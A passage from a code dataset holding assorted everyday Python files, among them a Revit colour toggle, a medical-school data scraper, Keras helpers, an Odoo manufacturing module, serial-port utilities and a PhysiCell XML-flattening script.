Autodesk.Revit.DB as DB\n\napp = __revit__.Application\n\n# not used ----------------------------------\n#doc = __revit__.ActiveUIDocument.Document\n#uidoc = __revit__.ActiveUIDocument\n#app = UIApplication.Application\n# --------------------------------------------\n\n#----------SETUP COLORS FOR CHECKING----------\ncheck_black = []\ncheck_white = []\nbg_check = []\n\ncolor_black = DB.Color(0,0,0)\ncolor_white = DB.Color(255,255,255)\n\ncheck_black.append(color_black.Red)\ncheck_black.append(color_black.Green)\ncheck_black.append(color_black.Blue)\n\ncheck_white.append(color_white.Red)\ncheck_white.append(color_white.Green)\ncheck_white.append(color_white.Blue)\n#---------------------------------------------\n#bg_col = app.BackgroundColor\n#\n#bg_check.append(bg_col.Red)\n#bg_check.append(bg_col.Green)\n#bg_check.append(bg_col.Blue)\n#---------------------------------------------\n\ndef get_bg_col(abc):\n bg_check.append(abc.Red)\n bg_check.append(abc.Green)\n bg_check.append(abc.Blue)\n return bg_check\n\n\ndef __selfinit__(script_cmp, ui_button_cmp, __rvt__):\n try:\n abc = app.BackgroundColor\n bg_check1 = get_bg_col(abc)\n if bg_check1 == check_black:\n #print('Background is black!')\n 
bg_state = False\n elif bg_check1 == check_white:\n #print('Background is not white!')\n bg_state = True\n else:\n exit()\n script.toggle_icon(bg_state)\n return True\n except:\n return False\n\n\ndef toggle_state():\n abc = app.BackgroundColor\n bg_check2 = get_bg_col(abc)\n\n if bg_check2 == check_black:\n #print('Background is black!')\n app.BackgroundColor = color_white\n bg_state = True\n elif bg_check2 == check_white:\n #print('Background is not black!')\n app.BackgroundColor = color_black\n bg_state = False\n else:\n exit()\n\n script.toggle_icon(bg_state)\n\n\nif __name__ == '__main__':\n toggle_state()\n\n# for timing -------------------------------------------------------------------\n#endtime = timer.get_time()\n#print(endtime)\n# ------------------------------------------------------------------------------\n","sub_path":"00_NEW EXTENSIONS/Background.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543221722","text":"import logging\nimport requests\nimport sys\nimport operator\nimport os\nimport functools\n\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nimport http.client as http\n\n# status = sys.argv[1] if sys.argv[1] else 'INFO'\n\n# http.HTTPConnection.debuglevel = 1\n\n# logging.basicConfig()\n\n# logger = logging.getLogger()\n# logger.setLevel(getattr(logging, status))\n\n# requests_log = logging.getLogger(\"requests.packages.urllib3\")\n# requests_log.setLevel(getattr(logging, status))\n# requests_log.propagate = True\n\n\ndef login(func):\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n\n payload = {\n 'user.username': os.getenv('MED_USER'),\n 'userSecurity.password': os.getenv('MED_PASS'),\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'\n }\n sess = requests.Session()\n sess.headers.update(headers)\n sess.post(\n \"https://services.aamc.org/30/ssoLogin/home/login/process\",\n data=payload\n )\n request = func(sess, *args, **kwargs)\n\n return request\n\n return wrapper\n\n\ndef scrape_parallel(start, end):\n\n msar = 'https://services.aamc.org/30/msar/schoolDetails/%d/about'\n pool = ThreadPool(8)\n\n links = [(msar % i) for i in range(start, end)]\n\n # logger.info('Started from %s to %s' % (start, end))\n\n bucket = pool.map(requests.get, links)\n html = [BeautifulSoup(req.content) for req in bucket]\n\n return [soup.find_all('div', id='schoolInfo') for soup in html]\n\n\n@login\ndef get_df(session):\n\n req = session.post(\"https://services.aamc.org/30/msar/search/resultData\", data={\n 'limit': 1000\n }).json()['searchResults']['rows']\n\n df = pd.DataFrame(req)\n return df.set_index('key')\n\n\n@login\ndef get_html(session, n, category='schoolInfo'):\n msar = 'https://services.aamc.org/30/msar/%s/%d/about' % (category, n)\n req = session.get(msar)\n\n if not req.ok:\n req.raise_for_status()\n\n return BeautifulSoup(req.content)\n\ndef discover_schools(start, end):\n legit = []\n pool = ThreadPool(8)\n results = pool.map(get_html, range(start, end + 1))\n\n return [discard(i) for i in results]\n\ndef discard(result):\n if 'Sign In' in result.title.text:\n raise IOError('Not Logged In')\n if 'ERROR' in result.title.text:\n None\n else:\n return True\n\nif __name__ == '__main__':\n schema = scrape_parallel(0,2)\n 
print(schema[0])\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"229261025","text":"#############################################################################\n### Търсене и извличане на информация. Приложение на дълбоко машинно обучение\n### Стоян Михов\n### Зимен семестър 2020/2021\n##########################################################################\n###\n### Домашно задание 3\n###\n#############################################################################\n\nimport random\n\ncorpusSplitString = '@\\n'\nmaxPoemLength = 10000\nsymbolCountThreshold = 100\n\ndef splitSentCorpus(fullSentCorpus, testFraction = 0.1):\n random.seed(42)\n random.shuffle(fullSentCorpus)\n testCount = int(len(fullSentCorpus) * testFraction)\n testSentCorpus = fullSentCorpus[:testCount]\n trainSentCorpus = fullSentCorpus[testCount:]\n return testSentCorpus, trainSentCorpus\n\ndef getAlphabet(corpus):\n symbols={}\n for s in corpus:\n for c in s:\n if c in symbols: symbols[c] += 1\n else: symbols[c]=1\n return symbols\n\ndef prepareData(corpusFileName, startChar, endChar, unkChar, padChar):\n file = open(corpusFileName,'r')\n poems = file.read().split(corpusSplitString)\n symbols = getAlphabet(poems)\n \n assert startChar not in symbols and endChar not in symbols and unkChar not in symbols and padChar not in symbols\n charset = [startChar,endChar,unkChar,padChar] + [c for c in sorted(symbols) if symbols[c] > symbolCountThreshold]\n char2id = { c:i for i,c in enumerate(charset)}\n \n corpus = []\n for i,s in enumerate(poems):\n if len(s) > 0:\n corpus.append( [startChar] + [ s[i] for i in range(min(len(s),maxPoemLength)) ] + [endChar] )\n\n testCorpus, trainCorpus = splitSentCorpus(corpus, testFraction = 0.01)\n print('Corpus loading completed.')\n return testCorpus, trainCorpus, char2id\n","sub_path":"hw-3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346302336","text":"#!/usr/bin/env python\nimport socket as sk\nHost=\"10.5.5.1\"\nPort=12346\ns=sk.socket(sk.AF_INET, sk.SOCK_STREAM)\ns.bind((Host, Port))\ns.listen(1)\nwhile(True):\n conn, addr = s.accept()\n print(\"Connnected by: \", addr)\n while True:\n data = conn.recv(64)\n if not data:\n print(\"------>\")\n break;\n print(data)\n\n","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461581326","text":"# This code was originally written by Neal Patwari in the SPAN Lab.\n\nimport sys\nimport platform\nimport glob\nimport numpy.ma as ma\nimport numpy as np\nimport serial\nimport time\nfrom struct import unpack\n\ndef parse_line(line):\n line_out = line.split(' ')\n tmp = np.array([float(item) for item in line_out])\n rss = tmp[:-1]\n time_stamp = tmp[-1]\n return rss, time_stamp\n\n\n# ########################################\n# Code to provide a fixed-length buffer data type\nclass FixedLenMaskedBuffer:\n def __init__(self, initlist, masked_value):\n self.frontInd = 0\n self.data = ma.masked_equal(initlist, masked_value)\n self.len = len(initlist)\n \n def list(self):\n oldest = self.frontInd+1\n return self.data[oldest:] + self.data[:oldest]\n \n # Append also deletes the oldest item\n def append(self, newItem):\n 
self.frontInd += 1\n if self.frontInd >= self.len:\n self.frontInd = 0\n self.data[self.frontInd] = newItem\n \n # Returns the \"front\" item\n def mostRecent(self):\n return self.data[self.frontInd]\n \n # Returns the N items most recently appended\n def mostRecentN(self,N):\n return [self.data[(self.frontInd-i)%self.len] for i in range(N-1,-1,-1)]\n \n # Returns the variance of the data\n def var(self):\n return np.var(self.data) \n# ######################################## \n\n# Convert Tx, Rx, and Ch numbers to link number\ndef linkNumForTxRxChLists(tx, rx, ch, nodeList, channelList):\n if (nodeList.count(tx) == 0) or (nodeList.count(rx) == 0) or (channelList.count(ch) == 0):\n sys.stderr.write('Error in linkNumForTxRx: tx, rx, or ch number invalid')\n rx_enum = nodeList.index(rx)\n tx_enum = nodeList.index(tx)\n ch_enum = channelList.index(ch)\n nodes = len(nodeList)\n links = nodes*(nodes-1)\n linknum = ch_enum*links + tx_enum*(nodes-1) + rx_enum\n if (rx_enum > tx_enum):\n linknum -= 1\n return linknum\n\n# Convert link number to Tx and Rx numbers\ndef txRxChForLinkNum(linknum, nodeList, channelList):\n nodes = len(nodeList)\n links = nodes*(nodes-1)\n ch_enum = linknum / links\n remLN = linknum % links\n tx_enum = remLN / (nodes-1)\n rx_enum = remLN % (nodes-1)\n if (rx_enum >= tx_enum):\n rx_enum+=1\n if (tx_enum >= nodes) | (ch_enum > len(channelList)):\n sys.stderr.write('Error in txRxForLinkNum: linknum or ch too high for nodes, channels values')\n else:\n ch = channelList[ch_enum]\n tx = nodeList[tx_enum]\n rx = nodeList[rx_enum]\n return (tx, rx, ch)\n\n\n\ndef hex2signedint(he):\n # Convert from hexidecimal 2's complement to signed 8 bit integer\n return (int(he,16) + 2**7) % 2**8 - 2**7\n\ndef prevChannel(channelList, ch_now):\n if (channelList.count(ch_now) > 0):\n i = channelList.index(ch_now)\n rval = channelList[(i-1) % len(channelList)]\n else:\n rval = -1 # Key for bad ch_now input\n return rval\n\n# USER: The following serial \"file name\" changes depending on your operating\n# system, and what name is assigned to the serial port when your listen\n# node is plugged in.\ndef serialFileName(): \n system_name = platform.system()\n #\n # LINUX USERS\n if system_name == 'Linux':\n # Automatically grab the USB filename (since the number after /dev/ttyACM may vary)\n usb_file_list = glob.glob('/dev/ttyACM*')\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n serial_filename = '0'\n #\n # WINDOWS USERS: Change 'COM#' to match what the system calls your USB port.\n elif system_name == 'Windows':\n serial_filename = 'COM3'\n #\n # MAC USERS\n else: # 'Darwin' indicates MAC OS X\n # Automatically grab the USB filename (since the number after /dev/tty.usb may vary)\n usb_file_list = glob.glob('/dev/tty.usb*')\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n #\n# return '/dev/tty.usbmodem411'\n# return '/dev/tty.usbmodem621'\n# return '/dev/ttyACM0'\n return serial_filename\n\n\n \n","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539126368","text":"\"\"\"\nfunctions in the file are all common utils that other module need\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\nfrom keras.utils.vis_utils import plot_model, 
model_to_dot #newer\n#from keras.utils.visualize_util import plot, model_to_dot\nfrom IPython.display import Image, SVG\n\ndef readCategories(fileName=\"./categories.txt\"):\n \"\"\"\n # Description: read all category indexes and names from disk file.\n # Arguments\n fileName: the file which categories are saved in\n # Returns\n dict of categories: {index:{'name':value}}\n # Raises\n None\n \"\"\"\n categories = {}\n dfCategories = pd.read_csv(fileName)\n print(dfCategories.shape)\n categories = dfCategories.set_index('index').T.to_dict(\"dict\")\n return categories\n\n\ndef readLabels(fileName=\"./train.csv\"):\n \"\"\"\n # Description: read labels for the samples.\n # Arguments\n fileName: the file which label are saved in\n # Returns\n list of sample id and label list: [{'id':, 'targetList':[]}]\n # Raises\n None\n \"\"\"\n labels = {}\n dfLabels = pd.read_csv(fileName)\n dfLabels['targetList'] = dfLabels.Target.str.split(' ')\n dfLabels.drop('Target',axis=1, inplace=True)\n print(dfLabels.head())\n labels = dfLabels.to_dict(\"recods\")\n return labels\n\n\ndef rebuildDir(dir):\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n \n \n# visualize model\ndef visualizeModel(model, modelName=None):\n if model == None or modelName == None:\n raise Exception(\"in save_model, invalid parameter\") \n imageName = modelName + \".png\"\n plot_model(model, to_file=imageName, show_shapes=True) #newer\n #plot(model, to_file=image_name, show_shapes=True)\n SVG(model_to_dot(model).create(prog='dot', format='svg'))\n \ndef visualizeHistory(history, modelName=None):\n if modelName == None:\n raise Exception(\"in visualize_history, please input your model_name\")\n print(history.history.keys())\n plt.figure(figsize=(12,4))\n plt.subplot(1, 2,1)\n \n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title(modelName + ' model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'valid'], loc='center right')\n plt.subplots_adjust(wspace = .5)\n \n # summarize history for loss\n plt.subplot(1, 2, 2)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title(modelName + ' model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'valid'], loc='center right')\n \n plt.show()\n \n#import h5py as h5py\ntry:\n import h5py\nexcept ImportError:\n h5py = None\ndef saveModel(model, modelName):\n if model == None or modelName == None:\n raise Exception(\"in save_model, invalid parameter\")\n #model.save_weights(modelName + '.h5')\n with open(modelName + '.json', 'w') as f:\n f.write(model.to_json())","sub_path":"kaggle/Human Protein Atlas Image Classification/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172631154","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass OLA_MRP_MrpProductions(models.Model):\n _inherit = \"mrp.production\"\n #mrp.production\n \n @api.multi\n def action_actializar(self):\n self.move_raw_ids = False\n self._generate_moves()\n self.action_eliminar_stock_move()\n return True\n\n @api.multi\n def action_eliminar_stock_move(self):\n id = self.ids[0]\n ids = self.env[\"stock.move\"].search(['&','&','&','&',\n ('origin','=',self.name),\n ('product_id','!=',self.product_id.ids[0]),\n ('production_id','not 
in',(id,)),\n ('raw_material_production_id','not in',(id,)),\n ('state','=','confirmed'),\n ])#.unlink() production_id\n for move in ids:\n move.action_cancel()\n\n ids = self.env[\"stock.move\"].search(['&','&','&','&',\n ('origin','=',self.name),\n ('product_id','=',self.product_id.ids[0]),\n ('production_id','=',id),\n ('raw_material_production_id','not in',(id,)),\n ('state','=','confirmed'),\n ],\n order=\"id desc\")\n\n if len(ids) > 1:\n conteo = 1\n while len(ids) > conteo:\n #ids[conteo].action_cancel()\n ids[conteo]._action_cancel()\n conteo += 1\n\n #ids = self.env[\"stock.move\"].search([('origin','=',self.name)])\n #id = 1\n\n #@api.onchange('bom_id')\n #def onchange_bom_id(self):\n # self.action_actializar()\n\n \n @api.multi \n def write(self, vals):\n res = super(OLA_MRP_MrpProductions, self).write(vals)\n if 'bom_id' in vals:\n self.action_actializar()\n return res\n\n\nOLA_MRP_MrpProductions()","sub_path":"OLA_MRP/models_herencia/OLA_MRP_MrpProductions.py","file_name":"OLA_MRP_MrpProductions.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"573604555","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#########################################################################\n# Author: zioer\n# mail: xiaoyu0720@gmail.com\n# Created Time: 2020年07月18日 星期六 20时04分41秒\n#########################################################################\nimport time\nimport requests as req\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\n\n\nPROXY = req.get('http://localhost:5030/get').json()['proxy']\n\nprint(PROXY)\n\nproxy = Proxy()\nproxy.http_proxy = PROXY\nproxy.ssl_proxy = PROXY\n\ncapabilities = webdriver.DesiredCapabilities.FIREFOX\nproxy.add_to_capabilities(capabilities)\n\nwith webdriver.Firefox(desired_capabilities=capabilities) as driver:\n driver.get(\"https://httpbin.org/ip\")\n print(driver.title)\n time.sleep(5)\n","sub_path":"selenium/test_proxy_firefox1.py","file_name":"test_proxy_firefox1.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"494043390","text":"from GeradorDeAnuncios.CriadorDeAnunciosMagento.ExportarPlanilha.ExportarCsv import ExportarCsv\nfrom GeradorDeAnuncios.CriadorDeAnunciosMagento.ExportarPlanilha.ExportarXlsx import ExportarXlsx\nfrom GeradorDeAnuncios.CriadorDeAnunciosMagento.UtilidadesGerais.Tratamento import Tratamento\n\n\nclass ExportarPlanilha:\n\n def __init__(self, planilha, caminho, sku='', tipo='print'):\n self._tipo = tipo\n self._planilha = self.__retiraDadosPlanilha(planilha)\n self._nomeArq = caminho\n self.__sku = sku\n \"\"\"\n caso não preencher a sku nao sera atualizado os codigos nos Json de SAP\n \"\"\"\n\n def __retiraDadosPlanilha(self, planilha):\n planilhaTratada = []\n for dic in planilha:\n del (dic['adicional_infos'])\n del (dic['prefixo'])\n del (dic['atributos'])\n del (dic['split'])\n del (dic['tipoSku'])\n try:\n url = dic['name_mktplace'].replace(' ', '-') + '-' + dic['sku'].replace('0', '').lower()\n url = Tratamento().retiraAcentos(url.lower())\n dic['url_key'] = url\n except:\n raise ValueError(\"Não foi possivel criar url\")\n planilhaTratada.append(dic)\n return planilhaTratada\n\n def __trataNomeArq(self):\n nomeArq = self._nomeArq.split('/')[-1]\n nomeArq = nomeArq.lower().replace('.csv', '').replace('.xlsx', '')\n return '/home/bertho/Documents/exp/' + nomeArq\n\n 
def exportar(self):\n if self._tipo == 'csv':\n exportCsv = ExportarCsv(self._planilha, self.__trataNomeArq())\n self.__sku.salvaSku()\n print()\n return exportCsv.exportar()\n elif self._tipo == 'print':\n # self.__sku.salvaSku()\n print()\n for item in self._planilha:\n print(item)\n print(f'\\nTotal de {len(self._planilha) + 1} linhas.')\n elif self._tipo == 'leitura':\n exportarXlsx = ExportarXlsx(self._planilha, self.__trataNomeArq())\n return exportarXlsx.exportar()\n else:\n raise ValueError(f'{self._tipo} nao sei oque fazer')\n","sub_path":"GeradorDeAnuncios/CriadorDeAnunciosMagento/ExportarPlanilha/ExportarPlanilha.py","file_name":"ExportarPlanilha.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156893676","text":"import json\nimport re\n\nimport csv\nimport os\nfrom tools.common.misc import abs_path\n\ndef read_json_config_file(file_name):\n required_fields_dict = get_fieldlist_from_json_file(file_name)\n return required_fields_dict\n\n\ndef get_file_ext(file_name_and_path):\n pattern_in = r'(.*)\\/([\\w|-]*)\\.(\\w+)$'\n\n groups = None\n iter = (re.finditer(pattern_in, file_name_and_path))\n for match in iter:\n groups = match.groups()\n return (groups[0], groups[1], groups[2])\n\ndef write_dictionary_into_json_file(file_path, file_name, dict_content):\n\n for k in dict_content:\n v = dict_content[k]\n if isinstance(v, str) == False:\n v_as_str = str(v)\n dict_content[k] = v_as_str\n pass\n\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n full_path = os.path.join(file_path, file_name)\n\n with open(full_path, 'w') as fp:\n # json.dump(dict_content, fp, indent=2, ensure_ascii=True )\n fp.write(json.dumps(dict_content, indent=2, ensure_ascii=True))\n\ndef write_dictionary_into_csv_file(file, dict_list):\n if len(dict_list) == 0:\n return None\n with open(abs_path(file), 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=dict_list[0].keys())\n writer.writeheader()\n for dict in dict_list:\n writer.writerow(dict)\n return len(dict_list)\n\ndef get_dictionarylist_operators_from_csv_file(file_in):\n\n def fn_get_primary_dicts():\n return _dict_list\n\n def fn_get_filtered_dicts(dict_list, field_names):\n fn_filter_dict = lambda dict : {k: dict[k] for k in field_names if k in dict.keys()}\n filtered_dicts = list(map(fn_filter_dict, dict_list))\n return filtered_dicts\n\n if os.path.isfile(file_in) == False:\n raise Exception(\"FILE {} does not exit\".format(file_in))\n\n _dict_list = []\n with open(file_in) as csvDataFile:\n csvReader = csv.DictReader(csvDataFile)\n for row in csvReader:\n row_dict = {}\n\n for k,v in row.items():\n row_dict[k] = v\n _dict_list.append(row_dict)\n return (fn_get_primary_dicts, fn_get_filtered_dicts)\n\ndef get_json_operation_functions(file_name):\n def fn_get_dictionary():\n return _dict\n\n def fn_get_field_list():\n field_list = set(_dict)\n return field_list\n\n _dict = {}\n\n with open(file_name, 'r') as json_data:\n _dict = json.load(json_data)\n\n\n return (fn_get_dictionary, fn_get_field_list)\n\ndef get_dictionary_from_json_file(file_path):\n fn_get_dictionary, _ = get_json_operation_functions(file_path)\n d = fn_get_dictionary()\n return d\n\ndef get_fieldlist_from_json_file(file_path):\n _, fn_get_field_list = get_json_operation_functions(file_path)\n fields = fn_get_field_list()\n return fields\n\ndef read_lines_from_text_file(file_name):\n with open(file_name, 'r', encoding='utf-8') as infile:\n lines =[]\n for 
line in infile.readlines():\n\n lines.append(line)\n return lines\n\n\n","sub_path":"tools/common/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633972810","text":"# from flask import Flask\nimport sounddevice as sd\nimport librosa\n\n# app = Flask(__name__)\n \n# @app.route(\"/\")\ndef main():\n name = input(\"Enter name of song:\")\n fs = 44100\n sd.default.samplerate = fs\n sd.default.channels = 2\n duration = 9\n rec = sd.rec(int(duration * fs), dtype='float64')\n sd.wait()\n librosa.output.write_wav(name+\"Hum.wav\", rec, fs)\n print(\"Done.\")\n \n# if __name__ == \"__main__\":\n# app.run()\n\nmain()\n\n\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603858661","text":"# flatten_cell_def_xml.py - convert a PhysiCell_settings.xml with inheritance of \n# into one without inheritance, i.e., verbose leaf s.\n#\n#\n# Author: Randy Heiland\n#\n\nimport xml.etree.ElementTree as ET\nimport sys\nimport string\n\nxml_file = \"PhysiCell_settings.xml\"\nargc = len(sys.argv)\nprint('argc=',argc)\nif argc == 2:\n xml_file = sys.argv[1]\nelif argc > 2:\n print('Error: too many args. Only 1 allowd (optional): [.xml config file]')\n#print('argv=',sys.argv)\n\n\"\"\"\nFor example:\n\t\n\t\t\n\t\t\t0\n\t\t\t42\n\t\t\t43\n\t\t\t\n\t\t\t\tA \n\t\t\t\n\t\t\n\t\t\n\t\t\t1\n\t\t\t\n\t\t\t\tA1 \n\t\t\t\n\t\t\n\"\"\"\n\n#--------------------------------------------------\nprint(\"\\n--- Phase 0: Build a Python dict, cell_def, that contains keys = name and values = {'ID':value, 'parent':value}\" )\n\ntree = ET.parse(xml_file) \nxml_root = tree.getroot()\n\n# \"cell_def\" will be a dict with key = cell_def name, value = {'ID':value, 'parent':value}\ncell_defs_dict = {}\ncell_defs = tree.find('cell_definitions')\nprint('cell_defs =',cell_defs)\nfor cd in list(cell_defs):\n print(cd.attrib)\n attrib_dict = {}\n attrib_dict['ID'] = cd.attrib['ID']\n if 'parent_type' in cd.attrib.keys():\n attrib_dict['parent'] = cd.attrib['parent_type']\n else:\n attrib_dict['parent'] = None\n cell_defs_dict[cd.attrib['name']] = attrib_dict\n\n # if (cell_defs_dict.attrib['name'] != 'default') and ('parent_type' in cell_defs_dict.attrib.keys() ): # and ('immune' in cell_defs_dict.attrib['parent_type'] ) :\n# if (cell_defs_dict.attrib['name'] != 'default') and (cell_defs_dict.attrib['name'] != 'immune') and ('parent_type' in cell_defs_dict.attrib.keys() ): # and ('immune' in cell_defs_dict.attrib['parent_type'] ) :\n# leaf_cell_defs[cell_defs_dict.attrib['name']] = cell_defs_dict.attrib['ID']\n \n#print('leaf_cell_defs= ',leaf_cell_defs) \nprint('cell_defs_dict= ',cell_defs_dict) \n\n#leaf_immune_cell_defs = [\"CD8 Tcell\", \"macrophage\", \"neutrophil\", \"DC\", \"CD4 Tcell\", \"fibroblasts\"]\n# leaf_immune_cell_defs = list(leaf_cell_defs.keys())\n# leaf_immune_cell_defs.remove('lung epithelium')\n# print('leaf_immune_cell_defs= ',leaf_immune_cell_defs) \n\nxml_root = tree.getroot()\n#--------------------------------------------------\nprint(\"\\n--- Phase 1: create a new .xml containing N copies of 'default' cell_definition, with desired names.\")\n\n#tree0 = tree\n#flat_root = xml_root\n# default_cell_def = xml_root.find(\"cell_definitions//cell_definition[@name='default']\")\ncell_defs = tree.find('cell_definitions')\n# root_node = 
cell_defs.getroot()\n#--------------------------------------------------\nprint(\"--- Remove all but root node (top cell_def)\")\n# May NOT be called \"default\", e.g.\n# cancer_biorobots: \n# Assuming root node is the first one.\nroot_node = True\nfor cd in list(cell_defs):\n # print(cell_def.tag, cell_defs_dict.attrib['name'])\n if (root_node):\n root_node = False\n else:\n print(\"removing \", cd.attrib['name'])\n cell_defs.remove(cd)\n # ET.SubElement(root_node,default_cell_def)\n # cell_defs.insert(0,default_cell_def)\n\n# new_xml_file = \"new_flat_config1.xml\"\n# new_xml_file = \"flat.xml\"\n# tree.write(new_xml_file)\n#sys.exit()\n\n#--------------------------------------------------\n# tree = ET.parse(\"new_flat_config1.xml\") \n# xml_root = tree.getroot()\n# For each child of the root node, make a copy of the root.\n\n#default_cell_def = xml_root.find(\"cell_definitions//cell_definition[@name='default']\")\n# NB: Assume the root will be the first one\nroot_cell_def = xml_root.find(\"cell_definitions//cell_definition\")\nroot_name = root_cell_def.attrib['name'] \nprint(\"--- Insert duplicate root cell_def for of its children\")\nprint(\" root_name = \",root_name)\ncd_vals = list(cell_defs_dict.values())\nprint(cd_vals)\n\nfor cd in cd_vals:\n # print('-- ',leaf)\n# print(cell_def.tag, cell_defs_dict.attrib['name'])\n # print(\"insert default for \", leaf.attrib['name'])\n # print(\"insert default for \", leaf)\n # default_cell_def.attrib['name'] = leaf\n # tmp_cd.attrib['name'] = leaf\n # cell_defs.insert(0,default_cell_def)\n\n # cell_defs.insert(0,default_cell_def)\n\n # if cd['parent'] == root_name: # handles just the children of root (not grandchildren, etc)\n if cd['parent']: # handles just the children of root (not grandchildren, etc)\n print('inserting child of ',root_name)\n cell_defs.insert(0,root_cell_def)\n # root_cell_def.attrib['name'] = 'bar'\n # child = xml_root.find(\"cell_definitions//cell_definition[2]\")\n # child.attrib['name'] = 'foo'\n#sys.exit()\n\n# NB! 
Need to save the file at this point and read it back in to continue processing.\nnew_xml_file = \"tmp1.xml\"\ntree.write(new_xml_file)\n\n#--------------------------------------------\ntree = ET.parse(\"tmp1.xml\") \nxml_root = tree.getroot()\nidx = 1\ncd_keys = list(cell_defs_dict.keys())\nfor cd in cd_vals:\n # if cd['parent'] == root_name: # handles just the children of root (not grandchildren, etc)\n if cd['parent']:\n # if cd.values()['parent'] == root_name:\n new_name = cd_keys[idx]\n new_ID = cd['ID']\n idx += 1\n # new_name = 'bar' + str(idx)\n print('renaming child of ',root_name,' to be ',new_name, 'with ID ',new_ID)\n xml_root.find(\"cell_definitions//cell_definition[\" +str(idx) + \"]\").attrib['name'] = new_name\n xml_root.find(\"cell_definitions//cell_definition[\" +str(idx) + \"]\").attrib['ID'] = new_ID\n # break\n # print(xml_root.find(\"cell_definitions//cell_definition[\" + str(idx) + \"]\"))\n\nnew_xml_file = \"tmp2.xml\"\n# new_xml_file = \"flat.xml\"\nprint(\"---> \",new_xml_file)\ntree.write(new_xml_file)\n\nsys.exit()\n#--------------------------------------------------\n# tree = ET.parse(\"new_flat_config1.xml\") \n# cell_defs = tree.find('cell_definitions')\n# xml_root = tree.getroot()\n\n# print(\"--- Change cell_def name for *each* leaf\")\n# idx = -1\n# leaf_name = list(leaf_cell_defs.keys())\n# for cell_def in list(cell_defs):\n# if idx >= 0:\n# cell_def.attrib['name'] = leaf_name[idx]\n# cell_def.attrib['ID'] = leaf_cell_defs[leaf_name[idx]]\n# cell_def.set(\"parent\",\"default\") # insert parent = \"default\" attribute\n\n# print(cell_def.attrib['name'])\n# idx += 1\n\n# new_xml_file = \"new_flat_config1.xml\"\n# tree.write(new_xml_file)\n# print(\"\\nDone. Please check the output file: \" + new_xml_file + \"\\n\")\n\n#--------------------------------------------------\n# We want to replace all the XML elements and attributes in the (copied) parent's with the\n# newly defined values provided by its children.\n#\nprint(\"\\n===================================================================================\")\nprint(\"--- Phase 2: update all children's elements and attributes.\")\n\n\"\"\"\nfor example:\n \t\t\n\t\t\t1\n\t\t\t\n\t\t\t\tA1 \n\t\t\t\n\"\"\"\n\ntree_flat = ET.parse(\"tmp2.xml\") \nxml_flat_root = tree_flat.getroot()\n\nsys.exit()\n\n#------------------------------------------------------------\n\nidx = -1\n# tree_orig = ET.parse(\"PhysiCell_settings.xml\") \ntree_orig = ET.parse(xml_file) \n# tree = ET.parse(\"new_flat_config1.xml\") \nxml_orig = tree_orig.getroot()\nuep = None\n# for requested cell_def param values in the original (inheritance) XML, copy them into the new (flattened) XML\nfor cd in xml_orig.findall('cell_definitions//cell_definition'):\n idx += 1\n if cd.attrib[\"name\"] == \"immune\": # we only want the \"immune\" cell def\n uep = cd\n print(\"---------------- processing immune cell_def at idx= \",idx) # 2 (0=default, 1=lung epi)\n # immune_uep = root.find('.//cell_definitions')\n for child in cd:\n if child.tag != 'custom_data':\n print(\"------- calling recurse_node on child=\",child)\n recurse_node(child,\"\",\"\") # should only call with child=, then recursively calls its children\nprint(\"\\nDone.\")\n\nnew_xml_file = \"new_flat_config2.xml\"\ntree_flat.write(new_xml_file)\nprint(\"\\nDone. 
